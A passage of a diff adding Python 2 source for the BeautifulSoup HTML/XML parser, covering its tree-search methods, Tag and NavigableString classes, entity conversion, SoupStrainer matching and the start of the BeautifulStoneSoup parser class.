+ self.nextSiblingGenerator, **kwargs)
+ fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
+
+ def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
+ """Returns the first item that matches the given criteria and
+ appears before this Tag in the document."""
+ return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
+
+ def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
+ **kwargs):
+ """Returns all items that match the given criteria and appear
+ before this Tag in the document."""
+ return self._findAll(name, attrs, text, limit, self.previousGenerator,
+ **kwargs)
+ fetchPrevious = findAllPrevious # Compatibility with pre-3.x
+
+ def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
+ """Returns the closest sibling to this Tag that matches the
+ given criteria and appears before this Tag in the document."""
+ return self._findOne(self.findPreviousSiblings, name, attrs, text,
+ **kwargs)
+
+ def findPreviousSiblings(self, name=None, attrs={}, text=None,
+ limit=None, **kwargs):
+ """Returns the siblings of this Tag that match the given
+ criteria and appear before this Tag in the document."""
+ return self._findAll(name, attrs, text, limit,
+ self.previousSiblingGenerator, **kwargs)
+ fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x
+
+ def findParent(self, name=None, attrs={}, **kwargs):
+ """Returns the closest parent of this Tag that matches the given
+ criteria."""
+ # NOTE: We can't use _findOne because findParents takes a different
+ # set of arguments.
+ r = None
+ l = self.findParents(name, attrs, 1)
+ if l:
+ r = l[0]
+ return r
+
+ def findParents(self, name=None, attrs={}, limit=None, **kwargs):
+ """Returns the parents of this Tag that match the given
+ criteria."""
+
+ return self._findAll(name, attrs, None, limit, self.parentGenerator,
+ **kwargs)
+ fetchParents = findParents # Compatibility with pre-3.x
+
+ #These methods do the real heavy lifting.
+
+ def _findOne(self, method, name, attrs, text, **kwargs):
+ r = None
+ l = method(name, attrs, text, 1, **kwargs)
+ if l:
+ r = l[0]
+ return r
+
+ def _findAll(self, name, attrs, text, limit, generator, **kwargs):
+ "Iterates over a generator looking for things that match."
+
+ if isinstance(name, SoupStrainer):
+ strainer = name
+ else:
+ # Build a SoupStrainer
+ strainer = SoupStrainer(name, attrs, text, **kwargs)
+ results = ResultSet(strainer)
+ g = generator()
+ while True:
+ try:
+ i = g.next()
+ except StopIteration:
+ break
+ if i:
+ found = strainer.search(i)
+ if found:
+ results.append(found)
+ if limit and len(results) >= limit:
+ break
+ return results
+
+ #These Generators can be used to navigate starting from both
+ #NavigableStrings and Tags.
+ def nextGenerator(self):
+ i = self
+ while i:
+ i = i.next
+ yield i
+
+ def nextSiblingGenerator(self):
+ i = self
+ while i:
+ i = i.nextSibling
+ yield i
+
+ def previousGenerator(self):
+ i = self
+ while i:
+ i = i.previous
+ yield i
+
+ def previousSiblingGenerator(self):
+ i = self
+ while i:
+ i = i.previousSibling
+ yield i
+
+ def parentGenerator(self):
+ i = self
+ while i:
+ i = i.parent
+ yield i
+
+ # Utility methods
+ def substituteEncoding(self, str, encoding=None):
+ encoding = encoding or "utf-8"
+ return str.replace("%SOUP-ENCODING%", encoding)
+
+ def toEncoding(self, s, encoding=None):
+ """Encodes an object to a string in some encoding, or to Unicode.
+ ."""
+ if isinstance(s, unicode):
+ if encoding:
+ s = s.encode(encoding)
+ elif isinstance(s, str):
+ if encoding:
+ s = s.encode(encoding)
+ else:
+ s = unicode(s)
+ else:
+ if encoding:
+ s = self.toEncoding(str(s), encoding)
+ else:
+ s = unicode(s)
+ return s
+
+class NavigableString(unicode, PageElement):
+
+ def __new__(cls, value):
+ """Create a new NavigableString.
+
+ When unpickling a NavigableString, this method is called with
+ the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
+ passed in to the superclass's __new__ or the superclass won't know
+ how to handle non-ASCII characters.
+ """
+ if isinstance(value, unicode):
+ return unicode.__new__(cls, value)
+ return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)
+
+ def __getnewargs__(self):
+ return (unicode(self),)
+
+ def __getattr__(self, attr):
+ """text.string gives you text. This is for backwards
+ compatibility for Navigable*String, but for CData* it lets you
+ get the string without the CData wrapper."""
+ if attr == 'string':
+ return self
+ else:
+ raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
+
+ def encode(self, encoding=DEFAULT_OUTPUT_ENCODING):
+ return self.decode().encode(encoding)
+
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return self
+
+class CData(NavigableString):
+
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return u'<![CDATA[' + self + u']]>'
+
+class ProcessingInstruction(NavigableString):
+
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ output = self
+ if u'%SOUP-ENCODING%' in output:
+ output = self.substituteEncoding(output, eventualEncoding)
+ return u'<?' + output + u'?>'
+
+class Comment(NavigableString):
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return u'<!--' + self + u'-->'
+
+class Declaration(NavigableString):
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return u'<!' + self + u'>'
+
+class Tag(PageElement):
+
+ """Represents a found HTML tag with its attributes and contents."""
+
+ def _invert(h):
+ "Cheap function to invert a hash."
+ i = {}
+ for k,v in h.items():
+ i[v] = k
+ return i
+
+ XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'",
+ "quot" : '"',
+ "amp" : "&",
+ "lt" : "<",
+ "gt" : ">" }
+
+ XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS)
+
+ def _convertEntities(self, match):
+ """Used in a call to re.sub to replace HTML, XML, and numeric
+ entities with the appropriate Unicode characters. If HTML
+ entities are being converted, any unrecognized entities are
+ escaped."""
+ x = match.group(1)
+ if self.convertHTMLEntities and x in name2codepoint:
+ return unichr(name2codepoint[x])
+ elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS:
+ if self.convertXMLEntities:
+ return self.XML_ENTITIES_TO_SPECIAL_CHARS[x]
+ else:
+ return u'&%s;' % x
+ elif len(x) > 0 and x[0] == '#':
+ # Handle numeric entities
+ if len(x) > 1 and x[1] == 'x':
+ return unichr(int(x[2:], 16))
+ else:
+ return unichr(int(x[1:]))
+
+ elif self.escapeUnrecognizedEntities:
+ return u'&amp;%s;' % x
+ else:
+ return u'&%s;' % x
+
+ def __init__(self, parser, name, attrs=None, parent=None,
+ previous=None):
+ "Basic constructor."
+
+ # We don't actually store the parser object: that lets extracted
+ # chunks be garbage-collected
+ self.parserClass = parser.__class__
+ self.isSelfClosing = parser.isSelfClosingTag(name)
+ self.name = name
+ if attrs == None:
+ attrs = []
+ self.attrs = attrs
+ self.contents = []
+ self.setup(parent, previous)
+ self.hidden = False
+ self.containsSubstitutions = False
+ self.convertHTMLEntities = parser.convertHTMLEntities
+ self.convertXMLEntities = parser.convertXMLEntities
+ self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities
+
+ def convert(kval):
+ "Converts HTML, XML and numeric entities in the attribute value."
+ k, val = kval
+ if val is None:
+ return kval
+ return (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);",
+ self._convertEntities, val))
+ self.attrs = map(convert, self.attrs)
+
+ def get(self, key, default=None):
+ """Returns the value of the 'key' attribute for the tag, or
+ the value given for 'default' if it doesn't have that
+ attribute."""
+ return self._getAttrMap().get(key, default)
+
+ def has_key(self, key):
+ return self._getAttrMap().has_key(key)
+
+ def __getitem__(self, key):
+ """tag[key] returns the value of the 'key' attribute for the tag,
+ and throws an exception if it's not there."""
+ return self._getAttrMap()[key]
+
+ def __iter__(self):
+ "Iterating over a tag iterates over its contents."
+ return iter(self.contents)
+
+ def __len__(self):
+ "The length of a tag is the length of its list of contents."
+ return len(self.contents)
+
+ def __contains__(self, x):
+ return x in self.contents
+
+ def __nonzero__(self):
+ "A tag is non-None even if it has no contents."
+ return True
+
+ def __setitem__(self, key, value):
+ """Setting tag[key] sets the value of the 'key' attribute for the
+ tag."""
+ self._getAttrMap()
+ self.attrMap[key] = value
+ found = False
+ for i in range(0, len(self.attrs)):
+ if self.attrs[i][0] == key:
+ self.attrs[i] = (key, value)
+ found = True
+ if not found:
+ self.attrs.append((key, value))
+ self._getAttrMap()[key] = value
+
+ def __delitem__(self, key):
+ "Deleting tag[key] deletes all 'key' attributes for the tag."
+ for item in self.attrs:
+ if item[0] == key:
+ self.attrs.remove(item)
+ #We don't break because bad HTML can define the same
+ #attribute multiple times.
+ self._getAttrMap()
+ if self.attrMap.has_key(key):
+ del self.attrMap[key]
+
+ def __call__(self, *args, **kwargs):
+ """Calling a tag like a function is the same as calling its
+ findAll() method. Eg. tag('a') returns a list of all the A tags
+ found within this tag."""
+ return apply(self.findAll, args, kwargs)
+
+ def __getattr__(self, tag):
+ #print "Getattr %s.%s" % (self.__class__, tag)
+ if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
+ return self.find(tag[:-3])
+ elif tag.find('__') != 0:
+ return self.find(tag)
+ raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag)
+
+ def __eq__(self, other):
+ """Returns true iff this tag has the same name, the same attributes,
+ and the same contents (recursively) as the given tag.
+
+ NOTE: right now this will return false if two tags have the
+ same attributes in a different order. Should this be fixed?"""
+ if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
+ return False
+ for i in range(0, len(self.contents)):
+ if self.contents[i] != other.contents[i]:
+ return False
+ return True
+
+ def __ne__(self, other):
+ """Returns true iff this tag is not identical to the other tag,
+ as defined in __eq__."""
+ return not self == other
+
+ def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
+ """Renders this tag as a string."""
+ return self.decode(eventualEncoding=encoding)
+
+ BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
+ + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
+ + ")")
+
+ def _sub_entity(self, x):
+ """Used with a regular expression to substitute the
+ appropriate XML entity for an XML special character."""
+ return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";"
+
+ def __unicode__(self):
+ return self.decode()
+
+ def __str__(self):
+ return self.encode()
+
+ def encode(self, encoding=DEFAULT_OUTPUT_ENCODING,
+ prettyPrint=False, indentLevel=0):
+ return self.decode(prettyPrint, indentLevel, encoding).encode(encoding)
+
+ def decode(self, prettyPrint=False, indentLevel=0,
+ eventualEncoding=DEFAULT_OUTPUT_ENCODING):
+ """Returns a string or Unicode representation of this tag and
+ its contents. To get Unicode, pass None for encoding."""
+
+ attrs = []
+ if self.attrs:
+ for key, val in self.attrs:
+ fmt = '%s="%s"'
+ if isString(val):
+ if (self.containsSubstitutions
+ and eventualEncoding is not None
+ and '%SOUP-ENCODING%' in val):
+ val = self.substituteEncoding(val, eventualEncoding)
+
+ # The attribute value either:
+ #
+ # * Contains no embedded double quotes or single quotes.
+ # No problem: we enclose it in double quotes.
+ # * Contains embedded single quotes. No problem:
+ # double quotes work here too.
+ # * Contains embedded double quotes. No problem:
+ # we enclose it in single quotes.
+ # * Embeds both single _and_ double quotes. This
+ # can't happen naturally, but it can happen if
+ # you modify an attribute value after parsing
+ # the document. Now we have a bit of a
+ # problem. We solve it by enclosing the
+ # attribute in single quotes, and escaping any
+ # embedded single quotes to XML entities.
+ if '"' in val:
+ fmt = "%s='%s'"
+ if "'" in val:
+ # TODO: replace with apos when
+ # appropriate.
+ val = val.replace("'", "&squot;")
+
+ # Now we're okay w/r/t quotes. But the attribute
+ # value might also contain angle brackets, or
+ # ampersands that aren't part of entities. We need
+ # to escape those to XML entities too.
+ val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val)
+ if val is None:
+ # Handle boolean attributes.
+ decoded = key
+ else:
+ decoded = fmt % (key, val)
+ attrs.append(decoded)
+ close = ''
+ closeTag = ''
+ if self.isSelfClosing:
+ close = ' /'
+ else:
+ closeTag = '</%s>' % self.name
+
+ indentTag, indentContents = 0, 0
+ if prettyPrint:
+ indentTag = indentLevel
+ space = (' ' * (indentTag-1))
+ indentContents = indentTag + 1
+ contents = self.decodeContents(prettyPrint, indentContents,
+ eventualEncoding)
+ if self.hidden:
+ s = contents
+ else:
+ s = []
+ attributeString = ''
+ if attrs:
+ attributeString = ' ' + ' '.join(attrs)
+ if prettyPrint:
+ s.append(space)
+ s.append('<%s%s%s>' % (self.name, attributeString, close))
+ if prettyPrint:
+ s.append("\n")
+ s.append(contents)
+ if prettyPrint and contents and contents[-1] != "\n":
+ s.append("\n")
+ if prettyPrint and closeTag:
+ s.append(space)
+ s.append(closeTag)
+ if prettyPrint and closeTag and self.nextSibling:
+ s.append("\n")
+ s = ''.join(s)
+ return s
+
+ def decompose(self):
+ """Recursively destroys the contents of this tree."""
+ contents = [i for i in self.contents]
+ for i in contents:
+ if isinstance(i, Tag):
+ i.decompose()
+ else:
+ i.extract()
+ self.extract()
+
+ def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
+ return self.encode(encoding, True)
+
+ def encodeContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
+ prettyPrint=False, indentLevel=0):
+ return self.decodeContents(prettyPrint, indentLevel).encode(encoding)
+
+ def decodeContents(self, prettyPrint=False, indentLevel=0,
+ eventualEncoding=DEFAULT_OUTPUT_ENCODING):
+ """Renders the contents of this tag as a string in the given
+        encoding. If encoding is None, returns a Unicode string."""
+ s=[]
+ for c in self:
+ text = None
+ if isinstance(c, NavigableString):
+ text = c.decodeGivenEventualEncoding(eventualEncoding)
+ elif isinstance(c, Tag):
+ s.append(c.decode(prettyPrint, indentLevel, eventualEncoding))
+ if text and prettyPrint:
+ text = text.strip()
+ if text:
+ if prettyPrint:
+ s.append(" " * (indentLevel-1))
+ s.append(text)
+ if prettyPrint:
+ s.append("\n")
+ return ''.join(s)
+
+ #Soup methods
+
+ def find(self, name=None, attrs={}, recursive=True, text=None,
+ **kwargs):
+ """Return only the first child of this Tag matching the given
+ criteria."""
+ r = None
+ l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
+ if l:
+ r = l[0]
+ return r
+ findChild = find
+
+ def findAll(self, name=None, attrs={}, recursive=True, text=None,
+ limit=None, **kwargs):
+ """Extracts a list of Tag objects that match the given
+ criteria. You can specify the name of the Tag and any
+ attributes you want the Tag to have.
+
+ The value of a key-value pair in the 'attrs' map can be a
+ string, a list of strings, a regular expression object, or a
+ callable that takes a string and returns whether or not the
+ string matches for some custom definition of 'matches'. The
+ same is true of the tag name."""
+ generator = self.recursiveChildGenerator
+ if not recursive:
+ generator = self.childGenerator
+ return self._findAll(name, attrs, text, limit, generator, **kwargs)
+ findChildren = findAll
+
+ # Pre-3.x compatibility methods. Will go away in 4.0.
+ first = find
+ fetch = findAll
+
+ def fetchText(self, text=None, recursive=True, limit=None):
+ return self.findAll(text=text, recursive=recursive, limit=limit)
+
+ def firstText(self, text=None, recursive=True):
+ return self.find(text=text, recursive=recursive)
+
+ # 3.x compatibility methods. Will go away in 4.0.
+ def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
+ prettyPrint=False, indentLevel=0):
+ if encoding is None:
+ return self.decodeContents(prettyPrint, indentLevel, encoding)
+ else:
+ return self.encodeContents(encoding, prettyPrint, indentLevel)
+
+
+ #Private methods
+
+ def _getAttrMap(self):
+ """Initializes a map representation of this tag's attributes,
+ if not already initialized."""
+ if not getattr(self, 'attrMap'):
+ self.attrMap = {}
+ for (key, value) in self.attrs:
+ self.attrMap[key] = value
+ return self.attrMap
+
+ #Generator methods
+ def recursiveChildGenerator(self):
+ if not len(self.contents):
+ raise StopIteration
+ stopNode = self._lastRecursiveChild().next
+ current = self.contents[0]
+ while current is not stopNode:
+ yield current
+ current = current.next
+
+ def childGenerator(self):
+ if not len(self.contents):
+ raise StopIteration
+ current = self.contents[0]
+ while current:
+ yield current
+ current = current.nextSibling
+ raise StopIteration
+
+# Next, a couple classes to represent queries and their results.
+class SoupStrainer:
+ """Encapsulates a number of ways of matching a markup element (tag or
+ text)."""
+
+ def __init__(self, name=None, attrs={}, text=None, **kwargs):
+ self.name = name
+ if isString(attrs):
+ kwargs['class'] = attrs
+ attrs = None
+ if kwargs:
+ if attrs:
+ attrs = attrs.copy()
+ attrs.update(kwargs)
+ else:
+ attrs = kwargs
+ self.attrs = attrs
+ self.text = text
+
+ def __str__(self):
+ if self.text:
+ return self.text
+ else:
+ return "%s|%s" % (self.name, self.attrs)
+
+ def searchTag(self, markupName=None, markupAttrs={}):
+ found = None
+ markup = None
+ if isinstance(markupName, Tag):
+ markup = markupName
+ markupAttrs = markup
+ callFunctionWithTagData = callable(self.name) \
+ and not isinstance(markupName, Tag)
+
+ if (not self.name) \
+ or callFunctionWithTagData \
+ or (markup and self._matches(markup, self.name)) \
+ or (not markup and self._matches(markupName, self.name)):
+ if callFunctionWithTagData:
+ match = self.name(markupName, markupAttrs)
+ else:
+ match = True
+ markupAttrMap = None
+ for attr, matchAgainst in self.attrs.items():
+ if not markupAttrMap:
+ if hasattr(markupAttrs, 'get'):
+ markupAttrMap = markupAttrs
+ else:
+ markupAttrMap = {}
+ for k,v in markupAttrs:
+ markupAttrMap[k] = v
+ attrValue = markupAttrMap.get(attr)
+ if not self._matches(attrValue, matchAgainst):
+ match = False
+ break
+ if match:
+ if markup:
+ found = markup
+ else:
+ found = markupName
+ return found
+
+ def search(self, markup):
+ #print 'looking for %s in %s' % (self, markup)
+ found = None
+ # If given a list of items, scan it for a text element that
+ # matches.
+ if isList(markup) and not isinstance(markup, Tag):
+ for element in markup:
+ if isinstance(element, NavigableString) \
+ and self.search(element):
+ found = element
+ break
+ # If it's a Tag, make sure its name or attributes match.
+ # Don't bother with Tags if we're searching for text.
+ elif isinstance(markup, Tag):
+ if not self.text:
+ found = self.searchTag(markup)
+ # If it's text, make sure the text matches.
+ elif isinstance(markup, NavigableString) or \
+ isString(markup):
+ if self._matches(markup, self.text):
+ found = markup
+ else:
+ raise Exception, "I don't know how to match against a %s" \
+ % markup.__class__
+ return found
+
+ def _matches(self, markup, matchAgainst):
+ #print "Matching %s against %s" % (markup, matchAgainst)
+ result = False
+ if matchAgainst == True and type(matchAgainst) == types.BooleanType:
+ result = markup != None
+ elif callable(matchAgainst):
+ result = matchAgainst(markup)
+ else:
+ #Custom match methods take the tag as an argument, but all
+ #other ways of matching match the tag name as a string.
+ if isinstance(markup, Tag):
+ markup = markup.name
+ if markup is not None and not isString(markup):
+ markup = unicode(markup)
+ #Now we know that chunk is either a string, or None.
+ if hasattr(matchAgainst, 'match'):
+ # It's a regexp object.
+ result = markup and matchAgainst.search(markup)
+ elif (isList(matchAgainst)
+ and (markup is not None or not isString(matchAgainst))):
+ result = markup in matchAgainst
+ elif hasattr(matchAgainst, 'items'):
+ result = markup.has_key(matchAgainst)
+ elif matchAgainst and isString(markup):
+ if isinstance(markup, unicode):
+ matchAgainst = unicode(matchAgainst)
+ else:
+ matchAgainst = str(matchAgainst)
+
+ if not result:
+ result = matchAgainst == markup
+ return result
+
+class ResultSet(list):
+ """A ResultSet is just a list that keeps track of the SoupStrainer
+ that created it."""
+ def __init__(self, source):
+        list.__init__(self, [])
+ self.source = source
+
+# Now, some helper functions.
+
+def isList(l):
+ """Convenience method that works with all 2.x versions of Python
+ to determine whether or not something is listlike."""
+ return ((hasattr(l, '__iter__') and not isString(l))
+ or (type(l) in (types.ListType, types.TupleType)))
+
+def isString(s):
+ """Convenience method that works with all 2.x versions of Python
+ to determine whether or not something is stringlike."""
+ try:
+ return isinstance(s, unicode) or isinstance(s, basestring)
+ except NameError:
+ return isinstance(s, str)
+
+def buildTagMap(default, *args):
+ """Turns a list of maps, lists, or scalars into a single map.
+ Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
+ NESTING_RESET_TAGS maps out of lists and partial maps."""
+ built = {}
+ for portion in args:
+ if hasattr(portion, 'items'):
+ #It's a map. Merge it.
+ for k,v in portion.items():
+ built[k] = v
+ elif isList(portion) and not isString(portion):
+ #It's a list. Map each item to the default.
+ for k in portion:
+ built[k] = default
+ else:
+ #It's a scalar. Map it to the default.
+ built[portion] = default
+ return built
+
+# Now, the parser classes.
+
+class HTMLParserBuilder(HTMLParser):
+
+ def __init__(self, soup):
+ HTMLParser.__init__(self)
+ self.soup = soup
+
+ # We inherit feed() and reset().
+
+ def handle_starttag(self, name, attrs):
+ if name == 'meta':
+ self.soup.extractCharsetFromMeta(attrs)
+ else:
+ self.soup.unknown_starttag(name, attrs)
+
+ def handle_endtag(self, name):
+ self.soup.unknown_endtag(name)
+
+ def handle_data(self, content):
+ self.soup.handle_data(content)
+
+ def _toStringSubclass(self, text, subclass):
+ """Adds a certain piece of text to the tree as a NavigableString
+ subclass."""
+ self.soup.endData()
+ self.handle_data(text)
+ self.soup.endData(subclass)
+
+ def handle_pi(self, text):
+ """Handle a processing instruction as a ProcessingInstruction
+ object, possibly one with a %SOUP-ENCODING% slot into which an
+ encoding will be plugged later."""
+ if text[:3] == "xml":
+ text = u"xml version='1.0' encoding='%SOUP-ENCODING%'"
+ self._toStringSubclass(text, ProcessingInstruction)
+
+ def handle_comment(self, text):
+ "Handle comments as Comment objects."
+ self._toStringSubclass(text, Comment)
+
+ def handle_charref(self, ref):
+ "Handle character references as data."
+ if self.soup.convertEntities:
+ data = unichr(int(ref))
+ else:
+ data = '&#%s;' % ref
+ self.handle_data(data)
+
+ def handle_entityref(self, ref):
+ """Handle entity references as data, possibly converting known
+ HTML and/or XML entity references to the corresponding Unicode
+ characters."""
+ data = None
+ if self.soup.convertHTMLEntities:
+ try:
+ data = unichr(name2codepoint[ref])
+ except KeyError:
+ pass
+
+ if not data and self.soup.convertXMLEntities:
+ data = self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref)
+
+ if not data and self.soup.convertHTMLEntities and \
+ not self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref):
+ # TODO: We've got a problem here. We're told this is
+ # an entity reference, but it's not an XML entity
+ # reference or an HTML entity reference. Nonetheless,
+ # the logical thing to do is to pass it through as an
+ # unrecognized entity reference.
+ #
+ # Except: when the input is "&carol;" this function
+ # will be called with input "carol". When the input is
+ # "AT&T", this function will be called with input
+ # "T". We have no way of knowing whether a semicolon
+ # was present originally, so we don't know whether
+ # this is an unknown entity or just a misplaced
+ # ampersand.
+ #
+ # The more common case is a misplaced ampersand, so I
+ # escape the ampersand and omit the trailing semicolon.
+ data = "&amp;%s" % ref
+ if not data:
+ # This case is different from the one above, because we
+ # haven't already gone through a supposedly comprehensive
+ # mapping of entities to Unicode characters. We might not
+ # have gone through any mapping at all. So the chances are
+ # very high that this is a real entity, and not a
+ # misplaced ampersand.
+ data = "&%s;" % ref
+ self.handle_data(data)
+
+ def handle_decl(self, data):
+ "Handle DOCTYPEs and the like as Declaration objects."
+ self._toStringSubclass(data, Declaration)
+
+ def parse_declaration(self, i):
+ """Treat a bogus SGML declaration as raw data. Treat a CDATA
+ declaration as a CData object."""
+ j = None
+ if self.rawdata[i:i+9] == '<![CDATA[':
+ k = self.rawdata.find(']]>', i)
+ if k == -1:
+ k = len(self.rawdata)
+ data = self.rawdata[i+9:k]
+ j = k+3
+ self._toStringSubclass(data, CData)
+ else:
+ try:
+ j = HTMLParser.parse_declaration(self, i)
+ except HTMLParseError:
+ toHandle = self.rawdata[i:]
+ self.handle_data(toHandle)
+ j = i + len(toHandle)
+ return j
+
+
+class BeautifulStoneSoup(Tag):
+
+ """This class contains the basic parser and search code. It defines
+ a parser that knows nothing about tag behavior except for the
+ following:
+
+ You can't close a tag without closing all the tags it encloses.
+ That is, "<foo><bar></foo>" actually means
+ "<foo><bar></bar></foo>".
+
+ [Another possible explanation is "<foo><bar /></foo>", but since
+ this class defines no SELF_CLOSING_TAGS, it will never use that
+ explanation.]
+
+ This class is useful for parsing XML or made-up markup languages,
+ or when BeautifulSoup makes an assumption counter to what you were
+ expecting."""
+
+ SELF_CLOSING_TAGS = {}
+ NESTABLE_TAGS = {}
+ RESET_NESTING_TAGS = {}
+ QUOTE_TAGS = {}
+ PRESERVE_WHITESPACE_TAGS = []
+
+ MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
+ lambda x: x.group(1) + ' />'),
+ (re.compile('<!\s+([^<>]*)>'),
+ lambda x: '<!' + x.group(1) + '>')
+ ]
+
+ ROOT_TAG_NAME = u'[document]'
+
+ HTML_ENTITIES = "html"
+ XML_ENTITIES = "xml"
+ XHTML_ENTITIES = "xhtml"
+ # TODO: This only exists for backwards-compatibility
+ ALL_ENTITIES = XHTML_ENTITIES
+
+ # Used when determining whether a text node is all whitespace and
+ # can be replaced with a single space. A text node that contains
+ # fancy Unicode spaces (usually non-breaking) should be left
+ # alone.
+ STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, }
+
+ def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
+ markupMassage=True, smartQuotesTo=XML_ENTITIES,
+ convertEntities=None, selfClosingTags=None, isHTML=False,
+ builder=HTMLParserBuilder):
+ """The Soup object is initialized as the 'root tag', and the
+ provided markup (which can be a string or a file-like object)
+ is fed into the underlying parser.
+
+ HTMLParser will process most bad HTML, and the BeautifulSoup
+ class has some tricks for dealing with some HTML that kills
+ HTMLParser, but Beautiful Soup can nonetheless choke or lose data
+ if your data uses self-closing tags or declarations
+ incorrectly.
+
+ By default, Beautiful Soup uses regexes to sanitize input,
+ avoiding the vast majority of these problems. If the problems
+ don't apply to you, pass in False for markupMassage, and
+ you'll get better performance.
+
+ The default parser massage techniques fix the two most common
+ instances of invalid HTML that choke HTMLParser:
+
+ <br/> (No space between name of closing tag and tag close)
+ <! --Comment--> (Extraneous whitespace in declaration)
+
+ You can pass in a custom list of (RE object, replace method)
+ tuples to get Beautiful Soup to scrub your input the way you
+ want."""
+
+ self.parseOnlyThese = parseOnlyThese
+ self.fromEncoding = fromEncoding
+ self.smartQuotesTo = smartQuotesTo
+ self.convertEntities = convertEntities
+ # Set the rules for how we'll deal with the entities we
+ # encounter
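+        # (e.g. with convertEntities=self.HTML_ENTITIES, '&ldquo;' in the
+        # markup is converted to u'\u201c'; with convertEntities=None it
+        # is left as the literal text '&ldquo;'.)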
+ if self.convertEntities:
+ # It doesn't make sense to convert encoded characters to
+ # entities even while you're converting entities to Unicode.
+ # Just convert it all to Unicode.
+ self.smartQuotesTo = None
+ if convertEntities == self.HTML_ENTITIES:
+ self.convertXMLEntities = False
+ self.convertHTMLEntities = True
+ self.escapeUnrecognizedEntities = True
+ elif convertEntities == self.XHTML_ENTITIES:
+ self.convertXMLEntities = True
+ self.convertHTMLEntities = True
+ self.escapeUnrecognizedEntities = False
+ elif convertEntities == self.XML_ENTITIES:
+ self.convertXMLEntities = True
+ self.convertHTMLEntities = False
+ self.escapeUnrecognizedEntities = False
+ else:
+ self.convertXMLEntities = False
+ self.convertHTMLEntities = False
+ self.escapeUnrecognizedEntities = False
+
+ self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
+ self.builder = builder(self)
+ self.reset()
+
+ if hasattr(markup, 'read'): # It's a file-type object.
+ markup = markup.read()
+ self.markup = markup
+ self.markupMassage = markupMassage
+ try:
+ self._feed(isHTML=isHTML)
+ except StopParsing:
+ pass
+ self.markup = None # The markup can now be GCed.
+ self.builder = None # So can the builder.
+
+ def _feed(self, inDocumentEncoding=None, isHTML=False):
+ # Convert the document to Unicode.
+ markup = self.markup
+ if isinstance(markup, unicode):
+ if not hasattr(self, 'originalEncoding'):
+ self.originalEncoding = None
+ else:
+ dammit = UnicodeDammit\
+ (markup, [self.fromEncoding, inDocumentEncoding],
+ smartQuotesTo=self.smartQuotesTo, isHTML=isHTML)
+ markup = dammit.unicode
+ self.originalEncoding = dammit.originalEncoding
+ self.declaredHTMLEncoding = dammit.declaredHTMLEncoding
+ if markup:
+ if self.markupMassage:
+ if not isList(self.markupMassage):
+ self.markupMassage = self.MARKUP_MASSAGE
+ for fix, m in self.markupMassage:
+ markup = fix.sub(m, markup)
+ # TODO: We get rid of markupMassage so that the
+ # soup object can be deepcopied later on. Some
+ # Python installations can't copy regexes. If anyone
+ # was relying on the existence of markupMassage, this
+ # might cause problems.
+ del(self.markupMassage)
+ self.builder.reset()
+
+ self.builder.feed(markup)
+ # Close out any unfinished strings and close all the open tags.
+ self.endData()
+ while self.currentTag.name != self.ROOT_TAG_NAME:
+ self.popTag()
+
+ def isSelfClosingTag(self, name):
+ """Returns true iff the given string is the name of a
+ self-closing tag according to this parser."""
+ return self.SELF_CLOSING_TAGS.has_key(name) \
+ or self.instanceSelfClosingTags.has_key(name)
+
+ def reset(self):
+ Tag.__init__(self, self, self.ROOT_TAG_NAME)
+ self.hidden = 1
+ self.builder.reset()
+ self.currentData = []
+ self.currentTag = None
+ self.tagStack = []
+ self.quoteStack = []
+ self.pushTag(self)
+
+ def popTag(self):
+ tag = self.tagStack.pop()
+ # Tags with just one string-owning child get the child as a
+ # 'string' property, so that soup.tag.string is shorthand for
+ # soup.tag.contents[0]
+ if len(self.currentTag.contents) == 1 and \
+ isinstance(self.currentTag.contents[0], NavigableString):
+ self.currentTag.string = self.currentTag.contents[0]
+
+ #print "Pop", tag.name
+ if self.tagStack:
+ self.currentTag = self.tagStack[-1]
+ return self.currentTag
+
+ def pushTag(self, tag):
+ #print "Push", tag.name
+ if self.currentTag:
+ self.currentTag.contents.append(tag)
+ self.tagStack.append(tag)
+ self.currentTag = self.tagStack[-1]
+
+ def endData(self, containerClass=NavigableString):
+ if self.currentData:
+ currentData = u''.join(self.currentData)
+ if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
+ not set([tag.name for tag in self.tagStack]).intersection(
+ self.PRESERVE_WHITESPACE_TAGS)):
+ if '\n' in currentData:
